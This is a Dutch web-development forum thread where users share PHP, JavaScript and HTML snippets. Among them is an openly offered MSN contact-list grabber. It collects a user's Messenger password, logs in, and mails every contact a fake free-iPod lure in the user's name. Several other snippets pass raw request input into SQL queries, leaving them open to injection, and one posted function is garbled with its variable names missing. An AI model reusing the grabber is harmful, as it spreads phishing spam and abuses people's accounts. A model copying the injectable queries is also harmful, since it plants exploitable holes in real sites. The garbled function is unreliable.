• De afgelopen dagen zijn er meerdere fora waarop bestaande accounts worden overgenomen door spammers. De gebruikersnamen en wachtwoorden zijn via een hack of een lek via andere sites buitgemaakt. Via have i been pwned? kan je controleren of jouw gegeven ook zijn buitgemaakt. Wijzig bij twijfel jouw wachtwoord of schakel de twee-staps-verificatie in.

Plaats Hier Je Leuke Scripjes

een makkelijk scriptje om pagina's te laden in div's zonder de pagina te refreshen:

Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>AJAX</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<script language="javascript">
var req;

function loadFile(url) {
   req = false;
 
  if(window.XMLHttpRequest) {
     try {
         req = new XMLHttpRequest();
    } catch(e) {
         req = false;
    }
  
  } else if(window.ActiveXObject) {
       try {
       req = new ActiveXObject("Msxml2.XMLHTTP");
      } catch(e) {
       try {
           req = new ActiveXObject("Microsoft.XMLHTTP");
       } catch(e) {
           req = false;
       }
      }
  }
   if(req) {
      req.onreadystatechange = processReqChange;
      req.open("GET", url, true);
      req.send(null);
   }
}

function processReqChange() {
 
  if (req.readyState == 4) {
    
    if (req.status == 200) {
      document.getElementById('vulmij').innerHTML = req.responseText;
    } else {
      alert("Probleem met verkrijgen van data:\n" +
        req.statusText);
    }
  }
}

</script>

</head>

<body>

<a href="#" onClick="loadFile('tekst.html');">Klik</a>

<div id="vulmij">

</div>

</body>
</html>
Mod:
Bron: http://www.leerhtml.nl/artikelen/16
//sorry mod :)


werkt echt makkelijk :)
 
Laatst bewerkt:
handiggggg
 
Ik kan hier wel haast mijn hele localhost uploaden, maar ik kies de mooiste uit:

Met dit script kunt je sommige dingen met je mysql-database doen, het is niet uitgebreid, maar toch gebruik ik het af en toe wel:
Code:
[SIZE=2]<?php
class connect_db
{
var $host = "localhost"; // je host
var $user = "root"; // je gebruikersnaam
var $pwd = "wachtwoord"; // je password
var $db = "db-naam"; // naam van de database
function connect()
{
$connection = mysql_connect($this->host, $this->user, $this->pwd) or die ("Error: kon geen verbinding maken met de database!");

/* als er vervolgens verbinding is gemaakt, kan PHP de database selecteren. */

if($connection) //als er verbinding gemaakt is, de database selecteren
{
$select_db = mysql_select_db($this->db) or die ("Error: kon de database niet selecteren!");
}
}
function insert($tabel,$rijnaam,$toevoeging,$rijnaam2,$toevoeging2)
{
$sql = "INSERT INTO `".$tabel."` SET `".$rijnaam."` = '".$toevoeging."',`".$rijnaam2."` = '".$toevoeging2."'";
mysql_query($sql) or die ("Het werkte niet!");
} // sluit de functie af
function delete($tabel,$rijnaam,$is,$limit)
{
if($limit==''){
$limit = 1;
}
$sql = "DELETE FROM `".$tabel."` WHERE `".$rijnaam."` = '".$is."' LIMIT ".$limit."";
mysql_query($sql) or die ("Het werkte niet!");
} // sluit de functie af
function update($tabel,$rijnaam,$update,$where,$is)
{
if($where != '' && $is != ''){
$sql = "UPDATE `".$tabel."` SET `".$rijnaam."` = '".$update."' WHERE `".$where."` = '".$is."'";
} else {
$sql = "UPDATE `".$tabel."` SET `".$rijnaam."` = '".$update."'";
}
mysql_query($sql) or die ("Het werkte niet!");
} // sluit de functie af
} // sluit de klasse
/*
Zo roep je 'm aan:
$obj = new connect_db;
$obj->connect(); 
*/
?>
[/SIZE]

Je kent het wel, je moet je script controleren op fouten en dan moet je al die regels foutcontrole iedere keer typen, include deze code in je code en al je problemen zijn opgelost(nou ja, niet allemaal) Het stuurt ook mysql fouten naar een mailadres:
Code:
[SIZE=2]<?php
ini_set('display_errors',1);
error_reporting(E_ALL);
function error($foutmelding, $lijn = __line__){
//hier de info voor in de mail
$error = mysql_error(); //dit is de error
$pagina = "http://".$_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; //dit is de pagina waar het gebeurde
$ip = $_SERVER['REMOTE_ADDR']; //dit is het ip adres van degene die de error tegenkwam
//hier de info voor de mail (headers enz.)
$aan = "[EMAIL="mailadres@mail.mail"]mailadres@mail.mail[/EMAIL]";
$sub = "Fout in een query";
$headers = "From: [EMAIL="mailadres@mail.mail"]mailadres@mail.mail[/EMAIL]\r\n";
$headers .= "Reply-to: [EMAIL="mailadres@mail.mail"]mailadres@mail.mail[/EMAIL]\r\n";
$headers .= "Priority: 3\r\n";
$headers .= "X-Priority: 3\r\n";
$headers .= "Date: " . date("r") . "\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/html; charset=iso-8859-1";
//hier wordt de mail gecreerd
$bericht = <<<eindbericht
<html>
<head>
<title>Fout</title>
</head>
<body>
<h1>Er is een fout opgetreden</h1>
<p>Er is iets foutgegaan in een query<br>
MySQL gaf de volgende error:<br />
$error<br />
dit gebeurde op devolgende pagina:<br />
$pagina<br />
En op de volgende lijn:<br />
$lijn</p>
<h3>info over degene die op deze pagina kwam:</h3>
<p>hier kun je info plaatsen.. bijv als het in een beveiligd gedeelte is de loginnaam<br />
Ip: $ip</p>
</body>
</html>
eindbericht;
//we verzenden de mail
$mail = mail($aan, $sub, $bericht, $headers);
if($mail){
//mail is verstuurd.. melding weergeven
exit("$foutmelding <br />\r\nEr is dus een mail naar de webmaster gestuurd<br />\r\nHij probeert er zo snel mogelijk iets aan te doen");
}
else{
//mail is niet verstuurd.. melding weergeven
exit("Er ging iets fout, maar er kon ook geen mail naar de webmaster gestuurd worden");
}
}
/*
Zo aanroepen:
$query = mysql_query("SELECT * FROM table WHERE dit = 'dat'") or error("Een foutmelding");
*/
?>

Nu volgt mijn laatste script, dit is zeer gewild :p. Het stuurt een mailtje naar iedereen in de contactlijst van iemand's msn. Je moet er wel opletten dat hier zeer veel php-extensions voor gebruikt worden en dit script niet altijd werkt:
Code:
[SIZE=2]<?php 
/* 
SQL:
=========================================
CREATE TABLE `contactlijst` (
`id` INT( 10 ) NOT NULL AUTO_INCREMENT ,
`adres` VARCHAR( 255 ) NOT NULL ,
UNIQUE (
`id` 
)
) TYPE = innodb;
=========================================
+-------------------------------------------------------+ 
| MSN Messenger Contactlist Grabber (.NET Passport) | 
+---------------------------------------------------+---+ 
| Name: MSN Messenger Contactlist Grabber | | 
| Description: This scripts grabs your contact- | | 
| list from your .NET Passport and | I | 
| shows all your contacts in your | N | 
| browser. | F | 
| Creator: Wesley Geysels | O | 
| Email: wesleyke@wesleyke.be | | 
| Date: 29 March 2006 | | 
+---------------------------------------------------+---+ 
| This program is free software; you can | | 
| redistribute it and/or modify it under the terms | L | 
| of the GNU General Public License as published | I | 
| by the Free Software Foundation; either version 2 | C | 
| of the License, or (at your option) any later | E | 
| version. | N | 
| | S | 
| If you think you made a great modification you | E | 
| can always mail it to my email shown above | | 
+---------------------------------------------------+---+ 

Extensie met importeren in mysql-database is gemaakt door
Teuneboon en mag mits je zijn naam erbij vermeld verspreid
worden over het web.
*/ 
error_reporting( E_ALL ^ E_NOTICE); 
set_time_limit ( 0 );
$inhoud_mail = "
Kom nu naar onze speciale msn-site! En maak kans op een gratis ipod, het enige wat je hoeft te doen is in te loggen op msn!, <a href=#>Klik hier</a> om naar de site te gaan, als de link niet werkt moet je deze link kopiren naar je adresbalk: http://www.link.nl";
echo "<html>\r\n"; 
echo "<head>\r\n"; 
echo "<title>MSN Messenger Contactlist Grabber</title>\r\n"; 
echo "<style type=\"text/css\">\r\n"; 
echo "body, input {\r\n"; 
echo "font: 10px Verdana;\r\n"; 
echo "}\r\n"; 
echo "</style>\r\n"; 
echo "</head>\r\n"; 
echo "<body>\r\n"; 
if(empty($_POST['username']) || empty($_POST['password'])) 
{ 
//No username or password filled in, show the login form: 
echo "</style>\r\n"; 
echo "<form action=\"\" method=\"post\">\r\n"; 
echo "Username:<br />\r\n"; 
echo "<input type=\"text\" value=\"\" name=\"username\" /><br /><br />\r\n"; 
echo "Password:<br />\r\n"; 
echo "<input type=\"password\" value=\"\" name=\"password\" /><br /><br />\r\n"; 
echo "<input type=\"submit\" value=\"Grab Contactlist\" name=\"submit\" />\r\n"; 
echo "</form>\r\n"; 
} 
elseif(!empty($_POST['username']) && !empty($_POST['password'])) 
{ 
/* 

+-----------------------------------------------------------------------------------+ 
| DO NOT CHANGE ANYTHING BELOW THIS | 
+-----------------------------------------------------------------------------------+ 
| Changing anything below here could harm the script and we don't want that do we? | 
+-----------------------------------------------------------------------------------+ 

*/ 

// 
// Required variables 
// 
$msnProtocol = "MSNP11"; 
$showOffline = 1; 
$sortBy = "status"; 
$session = md5(time()); 
$authCode = md5(time()+1); 
$started = time(); 
$transactionID = 0; 
$yourStatus = "FLN"; 
$list = ""; 
$username = $_POST['username']; 
$password = $_POST['password']; 

// 
// Needed functions 
// 
function doChallenge($key) 
{ 
return md5($key."Q1P7W2E4J9R8U3S5"); 
} 
function dataIn() 
{ 
global $connection; 
$dummy = fgets($connection, 256); 
return $dummy; 
} 
function dataOut($data) 
{ 
global $connection, $transactionID; 
fputs($connection, $data."\r\n"); 
$transactionID++; 
} 
function showContactList() 
{ 
global $contactList, $yourStatus, $session, $authCode, $showOffline, $sortBy, $username, $password, $postUrl; 
global $sid, $kv, $id, $mspauth, $timeSinceInit; 
$showContactlist = $contactList; 
if(!is_array($showContactlist)) 
{ 
$list.= "There are no users on your contactlist.\r\n"; 
} 
else 
{ 
foreach($showContactlist as $email => $elements) 
{ 
if($elements['status'] == "FLN") 
{ 
$dummyArray2[$email] = $elements; 
} 
else 
{ 
$dummyArray[$email] = $elements; 
} 
} 

$showContactlist = array(); 

if(is_array($dummyArray)) 
{ 
foreach($dummyArray as $email => $elements) 
{ 
$showContactlist[$email] = $elements; 
} 
} 

if(is_array($dummyArray2)) 
{ 
foreach($dummyArray2 as $email => $elements) 
{ 
$showContactlist[$email] = $elements; 
} 
} 

foreach ($showContactlist as $email => $elements) 
{ 
$name = $email; 
$nickname = urldecode($elements['username']); 
$list.= "<b>Email</b>:".$name."<br />\r\n"; 
$list.= "<b>Nickname</b>:".$nickname."<br /><br />\r\n"; 
} 
} 
return $list; 
} 

// 
// Grabbing the contactlist 
// 

echo "<div id=\"status\">Please be patient, this can take several minutes...<br /></div>\r\n\r\n"; 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Connecting to the MSN Server...\";\r\n</script>"; 
flush(); 
$connection = fsockopen('messenger.hotmail.com', 1863) or die("<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Couldn't establish a connection with the MSN Server!\";\r\n</script>\r\n"); 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Connected to the MSN Server!\";\r\n</script>\r\n"; 
flush(); 
dataOut("VER $transactionID $msnProtocol CVR0"); 
dataIn(); 
dataOut("CVR $transactionID 0x0409 winnt 5.1 i386 MSNMSGR 7.5.0324 MSMSGS $username"); 
dataIn(); 
dataOut("USR $transactionID TWN I $username"); 
$temp = dataIn(); 
if(!stristr($temp, ":")) 
{ 
if(substr($temp, 0, 3) == 601) 
{ 
die("The following error occured: <br />\r\n&nbsp;The MSN Servers are currently down."); 
} 
else 
{ 
die("Your username/password combination doesn't match.<br />\r\n"); 
} 
} 
@fclose($connection); 
$tempArray = explode(" ", $temp); 
$tempArray = explode(":", $tempArray[3]); 
flush(); 
$connection = fsockopen($tempArray[0], $tempArray[1]) or die("No XFR commando found: <br />{$tempArray[0]} :{$tempArray[1]}"); 
dataOut("VER $transactionID $msnProtocol CVR0"); 
dataIn(); 
flush(); 
dataOut("CVR $transactionID 0x0409 winnt 5.1 i386 MSNMSGR 7.5.0324 MSMSGS $username"); 
dataIn(); 
dataOut("USR $transactionID TWN I $username"); 
$temp = dataIn(); 
$tempArray = explode(" ", $temp); 
flush(); 
$TokenString = trim(end($tempArray)); 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Logging in...\";\r\n</script>\r\n"; 
flush(); 
$nexusSocket = fsockopen("ssl://nexus.passport.com", 443); 
fputs($nexusSocket, "GET /rdr/pprdr.asp HTTP/1.0\r\n\r\n"); 
while ($temp != "\r\n"){ 
$temp = fgets($nexusSocket, 1024); 
if(substr($temp, 0, 12) == "PassportURLs") 
{ 
$urls = substr($temp, 14); 
} 
} 
$tempArray = explode(",", $urls); 
$temp = $tempArray[1]; 
$temp = substr($temp, 8); 
$tempArray = explode("/", $temp); 
@fclose($nexusSocket); 
$sslConnection = fsockopen("ssl://".$tempArray[0], 443); 
fputs($sslConnection, "GET /{$tempArray[1]} HTTP/1.1\r\n"); 
fputs($sslConnection, "Authorization: Passport1.4 OrgVerb=GET, OrgUrl=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=".urlencode($username).",pwd=$password,$TokenString\r\n"); 
fputs($sslConnection, "User-Agent: MSMSGS\r\n"); 
fputs($sslConnection, "Host: {$tempArray[0]}\r\n"); 
fputs($sslConnection, "Connection: Keep-Alive\r\n"); 
fputs($sslConnection, "Cache-Control: no-cache\r\n\r\n"); 
$temp = fgets($sslConnection, 512); 
if(rtrim($temp) == "HTTP/1.1 302 Found") 
{ 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Bezig met aanmelden...\";\r\nlengteVooruitgang(30%);\r\n</script>"; 
flush(); 
while($temp != "\r\n") 
{ 
$temp = fgets($sslConnection, 256); 
if(substr($temp, 0, 9) == "Location:") 
{ 
$tempArray = explode(":", $temp); 
$tempArray = explode("/", trim(end($tempArray))); 
break; 
} 
} 
@fclose($sslConnection); 

$sslConnection = fsockopen("ssl://".$tempArray[2], 443); 
fputs($sslConnection, "GET /{$tempArray[3]} HTTP/1.1\r\n"); 
fputs($sslConnection, "Authorization: Passport1.4 OrgVerb=GET, OrgUrl=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=".urlencode($username).",pwd=$password,$TokenString\r\n"); 
fputs($sslConnection, "User-Agent: MSMSGS\r\n"); 
fputs($sslConnection, "Host: {$tempArray[2]}\r\n"); 
fputs($sslConnection, "Connection: Keep-Alive\r\n"); 
fputs($sslConnection, "Cache-Control: no-cache\r\n\r\n"); 
} 
elseif(rtrim($temp) == "HTTP/1.1 401 Unauthorized") 
{ 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"The username/password combination is wrong.\";\r\n</script>"; 
@fclose($sslConnection); 
die; 
} 
else 
{ 
if(rtrim($temp) != "HTTP/1.1 200 OK") 
{ 
echo "Unknown HTTP status code:<br />".$temp; 
flush(); 
die(); 
} 
} 
while($temp != "\r\n") 
{ 
$temp = fgets($sslConnection, 1024); 
if(substr($temp, 0, 19) == "Authentication-Info") 
{ 
$authInfo = $temp; 
$temp = fgets($sslConnection, 1024); 
if(substr($temp, 0, 14) != "Content-Length") 
{ 
$authInfo.= fgets($sslConnection, 1024); 
} 
break; 
} 
} 
@fclose($sslConnection); 
$tempArray = explode("'", $authInfo); 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Signing in...\";\r\n</script>"; 
flush(); 
dataOut("USR $transactionID TWN S {$tempArray[1]}"); 
flush(); 
$temp = dataIn(); 
switch(substr($temp, 0, 3)) 
{ 
case "928": 
case "911": 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"The username/password combination is wrong.\";\r\n</script>\r\n"; 
@fclose($sslConnection); 
die(); 
break; 
} 
flush(); 
$timeSinceInitmsg = time(); 
while(!strstr($temp, "ABCHMigrated") && is_string(trim($temp))) 
{ 
if(substr($temp, 0, 3) == "sid") 
{ 
$sid = trim(substr($temp, 5)); 
} 
if(substr($temp, 0, 2) == "kv") 
{ 
$kv = trim(substr($temp, 4)); 
} 
if(substr($temp, 0, 7) == "MSPAuth") 
{ 
$mspauth = trim(substr($temp, 9)); 
flush(); 
} 
$temp = dataIn(); 
} 
$temp = dataIn(); 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Signing in...\";\r\n</script>\r\n"; 
flush(); 
//dataOut("CHG $transactionID FLN"); 
dataOut("SYN $transactionID 0 0"); 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Retrieving contact list...\";\r\n</script>\r\n"; 
dataIn(); 
flush(); 
stream_set_timeout($connection, 0, 1); 
while(!feof($connection)) 
{ 
$stuff = trim(fgets($connection, 512)); 
switch (substr($stuff, 0, 3)){ 
case "CHL": //Server PING 
$parts = explode(" ", $stuff); 
$key = $parts[2]; 
dataOut("QRY $transactionID msmsgs@msnmsgr.com 32\r\n".doChallenge(trim($key))); 

break; 
case "PBR": //Antwoord na commando LST (Niet echt belangrijk) 
case "NLN": 
$boom = explode(' ',$stuff); 
if (!empty($statussen[$boom[1]])){ 
$contactList[$boom[2]]['status'] = $boom[1]; 
$contactList[$boom[2]]['username'] = $boom[3]; 
showContactlist(); 
} 
break; 
case "SYN": 
$tempArray = explode(" ",$stuff); 
$four = $tempArray[4]; 
break; 
case "MSG": 
$tempArray = explode(" ",$stuff); 
$message = ""; 
while(strlen($message) < $tempArray[3]){ 
$message.= fgets($connection, 256); 
} 
$temp = explode("\r\n", $message); 
if ($asdf[1] == "Content-type: application/x-msmsgssystemmessage") 
{ 
$tempArray = explode(":",$temp[3]); 
$type = $tempArray[1]; 
$tempArray = explode(":",$temp[4]); 
$arg1 = $tempArray[1]; 
if ($type == 1){ 
echo "<script>\r\nalert(\"The server is going down for maintainance in $arg1 minutes.\");\r\n</script>\r\n"; 
} 
} 
break; 
case "FLN": 
$tempArray = explode(" ",$stuff); 
$contactList[$tempArray[1]]['status'] = "FLN"; 
showContactlist(); 
break; 
case "OUT": 
if (substr($stuff,4,3) == 'OTH'){ 
echo "<script>\r\nalert(\"You are already logged in on an other location.\");\r\n</script>\r\n"; 
@fclose($connection); 
die(); 
} else { 
echo "<script>\r\ndocument.getElementById(\"status\").innerHTML=\"You were disconnected.<br /><a href=\"javascript:document.location.reload();\">Try Again<a/></font>\";\r\n</script>\r\n"; 
@fclose($connection); 
die(); 
} 
break; 
case "PRP": 
$tempArray = explode(" ",$stuff); 
if ($tempArray[1] == "MFN"){ 
$huidigeNaam = $tempArray[3]; 
} 
break; 
case "LST": 
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"$username, here is your contactlist:<br /><br />\";\r\n</script>\r\n"; 

$tempArray = explode(" ",$stuff); 
if((substr($tempArray[1], 0, 2) == "N=") && (!is_numeric($tempArray[2]))) 
{ 
echo urldecode(substr($tempArray[1], 2))."<br />\r\n";
$headers = "From: " . $_POST['username'] . " <" . $_POST['username'] . ">";

$headers = stripslashes($headers);
$headers = str_replace("\n", "", $headers);
$headers = str_replace("\r", "", $headers);
$headers = str_replace("\"", "\\\"", str_replace("\\", "\\\\", $headers));
mail(urldecode(substr($tempArray[1], 2)), "Hallo!", $inhoud_mail, $headers);
} 
break; 
case "LSG": 
$tempArray = explode(" ",$stuff); 
$groups[$tempArray[2]] = $tempArray[1]; 
break; 
case "CHG": 
$tempArray = explode(" ",$stuff); 
$nieuweStatus = $tempArray[2]; 
break; 
case "BLP": // Geblokkeerd of niet? 
case "GTC": 
break; 
case "403": 
echo "An error has occured, please try again.<br>"; 
break; 
} 
flush(); 
} 

} 
echo "</body>\r\n"; 
echo "</html>"; 
?>
[/SIZE][/SIZE]
 
HTML:
<html>

  <head>
  
    <title>
      Text to TextBox and back
    </title>
    
    <script type="text/javascript">
    
      function doeIets(id) {
        document.getElementById(id).style.display = 'none';
        document.getElementById(id+'p').style.display = 'block';
      }
      function doeAnders(id, twee) {
        var text = document.getElementById(id).value;
        alert(text + twee);
        location.href = "texttobox.html";
      }
    
    </script>
    
  </head>
  
  <body>
  
    <p id="1" onClick="doeIets(this.id)">text</p>
    <input type="text" onBlur="doeAnders(this.id, 'drie')" id="1p" value="text" style="display:none;">
  
  </body>

</html>
Leuk script om platte text te veranderen in een textbox.
Zeker i.c.m. php is het handig, zo kun je de 'location.href' aanpassen naar een mysql_insert waardoor de gewijzigde text gelijk opgeslagen word in de database. Een voorbeeld:

javascript:
HTML:
    <script type="text/javascript">
    
      function doeIets(id) {
        document.getElementById(id).style.display = 'none';
        document.getElementById(id+'p').style.display = 'block';
      }
      function doeAnders(id, twee) {
        var text = document.getElementById(id).value;
        location.href = "settings.php?actie=edit&id=" + twee + "&value=" + text;
      }
    
    </script>
php:
PHP:
  $actie = $_REQUEST["actie"];

  if(!isset($actie))
  {
    overzicht();
  }else{
    if($actie == "edit"){
      if($_REQUEST['value'] == "rechts")
      {  $align = "1"; 
        mysql_query("UPDATE `voorpagina` SET `align` = '" . $align . "' WHERE `id` = '" . $_REQUEST['id'] . "';");
      }elseif($_REQUEST['value'] == "links"){  $align = "0"; 
        mysql_query("UPDATE `voorpagina` SET `align` = '" . $align . "' WHERE `id` = '" . $_REQUEST['id'] . "';");
      }else{ print("alleen kleine letters zijn toegestaan!");
      }
      overzicht();
    }else{
      overzicht();
    }
  }
100% zelfgemaakt! :agree:
 
Voor een applicatie die moet werken als een kalender de volgende functie geschreven om aan de begin en eind datum van een opgegeven week te komen.

Code:
function getUserWeek(, , ) {
     = mktime(0,0,0,1,1,);

     = strtotime("+". - 1 ." weeks", );

     = strftime('%d-%m-%Y', strtotime("This monday", ));
     = strftime('%d-%m-%Y', strtotime("This sunday", ));
    
    echo . " t/m " . ;
  }

Rekent terug vanaf de eerste dag van het jaar.
 
Code:
<a href="#" onclick="window.external.AddFavorite('http://www.google.nl', 'google.');window.external.AddFavorite('http://www.softcity.nl', 'softcity ncf');window.external.AddFavorite('http://www.yahoo.com', 'yahoo');return false;">hier je eigen tekst</a>
bij dit stukje
Code:
]<a href="#" onclick="window.external.AddFavorite
kan je bij het hekje kiezen of hij daarna naar een andere pagina gaat of dat hij gewoon op dezelfde pagina blijft (laat dan het hekje staan)
het is honderd procent zelfgemaakt en je kan natuurlijk zoveel links toevoegen als je wil door steets dit stukje opnieuw in te voeren
Code:
window.external.AddFavorite('http://www.yourwebsite.nl', 'yourwebsite');
 
Voor een automatich copyright

PHP:
<div id="footer">
&copy; Copyright <?php 
$then = 2007; 
$now = date('Y'); 
if ($then == $now)
echo $now;
else
echo "$then - $now"; ?>

</div>
 
ddd, is dat waardig genoeg om hier te posten? :p dit is simpelweg laten zien hoe de date(); functie werkt..
 
Tja... :p

Dat kan je denk ik wel over veel berichten hier op het forum :p
 
Ik heb een script om rechtsklik te voorkomen met een popup met tekst.

<script language="JavaScript" type="text/JavaScript">
var message="De inhoud van deze pagina is niet bedoeld om te downloaden.";
function trapIE4(){if (event.button==2){alert(message);return false;}}
function trapNS4(e){if (document.getElementById&&!document.all||document.layers){
if (e.which==2||e.which==3){alert(message);return false;}}}
if (document.layers){document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=trapNS4;}
else if (document.all&&!document.getElementById){
document.onmousedown=trapIE4;}
document.oncontextmenu=new Function("alert(message);return false")
</script>

Gevonden op een site van Boris Vallejo.
Zie ook toepassing op http://www.janet-snoek.nl/MoManning/kaarten.html
 
Ik heb nog een grappig scriptje, het laat het lijken alsof tekst getypt wordt.
Eerste parameter is het element waarin je het wilt laten gebeuren en de tweede parameter is de tekst.
Een enter doe je door ^ te typen.
Code:
function typewriter(div,text){
		var str = text;
		var strlength = str.length;
		var elem = document.getElementById(div);
		var i = 0;
		var test = str.substring(0,0);
		console.log(test);
		var int = setInterval(function(){
			var sub = str.substring(0,i);
			var sub = sub.replace(/\^/g,"<br />")
			elem.innerHTML = sub+"<b>|</b>";
			if(i==strlength){
				clearInterval(int);
			}
			i++;
		},100);
	}
	window.onload = function(){typewriter("test","haha");}
 
PHP:
Do
  MsgBox("Hoi")
Loop
 
hoi,
Hoe kan ik mijn tekst scripts en derg op mijn site plaatsen waar ik wil??
Als ik een tekst 4 regels onder een andere plaats, komt hij er toch strak achter!!(sorry ben beginner)
thx
Gerben
Je kunt dit doen:
<br> &nbsp
<br> &nbsp
<br> &nbsp
<br> &nbsp
(de simpelste manier)

of je kunt dit doen met css:
<div style="padding:100px;">
hier volgt je script
</div>

of je positioneert hem met css:
<div style="position:absolute; top:10%; left:20%;">
hier volgt je script
</div>

je kunt de getallen naar wens invullen
 
Laatst bewerkt door een moderator:
ik snap ff niet waarom je een <script> zou willen stylen? heeft niet zoveel nut :p
 
ik snap ff niet waarom je een <script> zou willen stylen? heeft niet zoveel nut :p

Ik bedoelde dat er div omheen gezet moest worden.
dab kun je goed absolute positionering toepassen.
sorry voor de ontduidelijkheid.
Dat heb je als je te snel wilt:fun:
 
Ik denk dat je script dan beter in div kan veranderen, want dit is alleen maar onduidelijk voor de lezers...
 
PHP:
function printList($type = "ul", $class, $items) {
  if(empty($items)) {
    return false;
  }

  echo "<" . $type . (!empty($class) ? " class=\"" . $class . "\"" : "") . ">";

  foreach($items as $item) {
    echo "<li>" . $item . "</li>";
  }

  echo "</" . $type . ">";
}

Type meegeven (ol of ul, default ul), optionele klasse en je array met waar je je lijst van wilt.
 
Laatst bewerkt door een moderator:
PHP:
Do
  MsgBox("Hoi")
Loop

dit is toch geen php script...
deze is voor in VB/VBS (heb ik ook welles gebruikt)
een laat in joun geval hoi oneindig tonen tenzij je WSscript afluit in processen
 
dit is toch geen php script...
deze is voor in VB/VBS (heb ik ook welles gebruikt)
een laat in joun geval hoi oneindig tonen tenzij je WSscript afluit in processen

-_- goh je meent het... uiteraard was dit niet de bedoeling van Naxiz...
 
PHP:
<?php
$link = mysql_connect('localhost','root','');
mysql_select_db('btw');

$result = mysql_query('SELECT id,prijs FROM producten');

while($row = mysql_fetch_array($result))
{
 		$afronding = '';
 	$prijs = $row['prijs'];
		$prijsZonderBtw = ($prijs /119*100);
		//echo $prijsZonderBtw.'<br/>';
		//$prijsZonderBtw = $prijs - $prijsZonderBtw;
		$prijsMetBtw = $prijsZonderBtw * 1.21;
		$prijsincbtw = number_format(($prijsMetBtw),2);
		$afronding = explode('.',$prijsincbtw);
		$last = $afronding[1];
		if($last >= 0 && $last < 25)
		{
		 		$prijs = (int)$afronding[0].'.25';
		}
		if($last > 25 && $last < 50)
		{
		 		$prijs = (int)$afronding[0].'.49';
		}
		if($last > 50 && $last < 75)
		{
		 		$prijs = (int)$afronding[0].'.75';
		}
		if($last > 75 && $last <= 99)
		{
		 		$prijs = (int)$afronding[0].'.99';
		}
		if(!number_format($prijs,0)==$prijs)
		{
		 		$prijs = (int)$afronding[0].'00';
		}
		if(empty($prijs))
		{
		 		echo 'FOUT: product met id '.$row['id'].' en een oude prijs van '.$row['prijs'];
		}
		mysql_query('UPDATE producten SET prijs= "'.$prijs.'" WHERE id="'.$row['id'].'"');
		echo 'Oude prijs was'.$row['prijs'].' en is nu '.$prijs.' het product heeft id '.$row['id'];
		//print_r($afronding).'<br/>';
		//echo $prijsincbtw.'<br/>'; 
}
echo mysql_error();
mysql_close($link);
?>
handig voor webshops die naar 21 procent moeten en gezonde bedragen willen op hun website. hij zet het bedrag uit de database om in een bedrag met 21 procent btw.
 
Laatst bewerkt door een moderator:

Nieuwste berichten

Terug
Bovenaan